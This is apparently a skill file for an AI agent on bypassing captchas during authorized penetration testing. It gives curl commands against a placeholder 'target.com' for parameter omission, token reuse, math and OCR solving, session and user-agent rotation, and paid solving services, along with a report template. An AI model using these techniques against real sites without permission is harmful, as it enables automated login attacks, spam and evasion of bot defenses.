--- name: captcha-bypass description: Techniques for bypassing captchas during authorized security testing and penetration testing. Use this skill whenever you're testing web applications and encounter captcha challenges that need to be automated or bypassed for testing purposes. This includes penetration testing, security assessments, and authorized vulnerability scanning. Don't use this for unauthorized access or malicious purposes. --- # Captcha Bypass Techniques This skill provides techniques for bypassing captchas during **authorized security testing**. The goal is to streamline testing workflows, not to undermine security controls in production without authorization. ## When to Use This Skill Use this skill when: - You're conducting authorized penetration testing on web applications - You need to automate security testing workflows that encounter captchas - You're building security testing tools that need to handle captcha challenges - You're assessing captcha implementation strength in a controlled environment ## Core Techniques ### 1. Parameter Manipulation Try modifying how the captcha parameter is sent: **Omit the captcha parameter entirely:** ```bash # Remove captcha field from request curl -X POST https://target.com/login \ -d "username=test&password=secret" ``` **Change HTTP method:** ```bash # Try GET instead of POST curl -X GET "https://target.com/login?username=test&password=secret" ``` **Switch data format:** ```bash # Try JSON instead of form data curl -X POST https://target.com/login \ -H "Content-Type: application/json" \ -d '{"username":"test","password":"secret"}' ``` **Send empty captcha value:** ```bash curl -X POST https://target.com/login \ -d "username=test&password=secret&captcha=" ``` ### 2. Value Extraction and Reuse **Search page source for captcha values:** ```bash curl -s https://target.com/login | grep -i captcha curl -s https://target.com/login | grep -oE '[a-zA-Z0-9]{8,}' ``` **Check cookies for stored values:** ```bash curl -s -c cookies.txt -L https://target.com/login cat cookies.txt | grep -i captcha ``` **Reuse previous successful values:** ```bash # Store and reuse captcha tokens export CAPTCHA_TOKEN="abc123xyz" curl -X POST https://target.com/login \ -d "username=test&password=secret&captcha=$CAPTCHA_TOKEN" ``` **Test session reuse:** ```bash # Use same session across requests curl -c session.txt -b session.txt https://target.com/login ``` ### 3. Mathematical Captcha Automation For simple math captchas, automate the calculation: ```bash # Extract and solve math captcha CAPTCHA_EXPR=$(curl -s https://target.com/captcha | grep -oE '[0-9]+\s*[+\-*/]\s*[0-9]+') CAPTCHA_ANSWER=$(echo "$CAPTCHA_EXPR" | bc) curl -X POST https://target.com/login \ -d "username=test&password=secret&captcha=$CAPTCHA_ANSWER" ``` ### 4. Image Recognition **Count unique captcha images:** ```bash # Download and hash images to find patterns for i in {1..100}; do curl -s https://target.com/captcha.png -o captcha_$i.png md5sum captcha_$i.png done | sort | uniq -c | sort -rn ``` **Use OCR for text extraction:** ```bash # Install tesseract first: apt install tesseract-ocr curl -s https://target.com/captcha.png -o captcha.png tesseract captcha.png stdout --psm 6 ``` ### 5. Rate Limit Testing Check if rate limits can be bypassed: ```bash # Test submission limits for i in {1..10}; do curl -s -o /dev/null -w "%{http_code} " https://target.com/login \ -d "username=test&password=secret&captcha=test" sleep 1 done echo ``` ### 6. Header and Session Manipulation **Rotate User-Agents:** ```bash USER_AGENTS=( "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/91.0" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Safari/605.1" "Mozilla/5.0 (X11; Linux x86_64) Firefox/89.0" ) for ua in "${USER_AGENTS[@]}"; do curl -A "$ua" https://target.com/login done ``` **Session rotation:** ```bash # Generate new session for each request curl -c /tmp/session_$$.txt -b /tmp/session_$$.txt https://target.com/login rm /tmp/session_$$.txt ``` ### 7. Third-Party Services For complex captchas (reCAPTCHA, Cloudflare, etc.), consider: - **CapSolver**: AI-powered captcha solving API - **2Captcha**: Human-powered solving service - **Anti-Captcha**: Another solving service option **Example API integration:** ```bash # CapSolver example (requires API key) curl -X POST https://api.capsolver.com \ -H "Content-Type: application/json" \ -d '{ "clientKey": "YOUR_API_KEY", "task": { "type": "ReCaptchaV2Task", "websiteURL": "https://target.com", "websiteKey": "6LeIxAcTAAAAAJcZVRqyHh71UMIEGNQ_MXjiZKhI" } }' ``` ## Testing Workflow 1. **Document authorization** - Ensure you have written permission 2. **Start with parameter manipulation** - Easiest to implement 3. **Progress to automation** - Math, OCR, or services 4. **Test rate limits** - Understand constraints 5. **Document findings** - Report bypass methods found ## Output Format When documenting captcha bypass findings, use this structure: ``` ## Captcha Bypass Assessment ### Target - URL: [target URL] - Captcha Type: [reCAPTCHA v2/v3, image, math, etc.] ### Techniques Tested - [x] Parameter omission - [x] Empty value submission - [x] Session reuse - [ ] OCR automation - [ ] Third-party services ### Results - Bypassable: [Yes/No/Partial] - Method: [description of successful technique] - Risk Level: [Low/Medium/High] ### Recommendations - [specific remediation steps] ``` ## Important Notes - **Authorization Required**: Only use these techniques on systems you own or have explicit permission to test - **Rate Limiting**: Be respectful of target systems to avoid causing denial of service - **Documentation**: Always document your testing scope and findings - **Legal Compliance**: Ensure compliance with applicable laws and regulations ## Common Captcha Types | Type | Difficulty | Recommended Approach | |------|------------|---------------------| | Math | Low | Automate calculation | | Text Image | Medium | OCR or hash analysis | | reCAPTCHA v2 | High | Third-party service | | reCAPTCHA v3 | High | Third-party service | | Cloudflare | Very High | Specialized tools | | hCaptcha | High | Third-party service |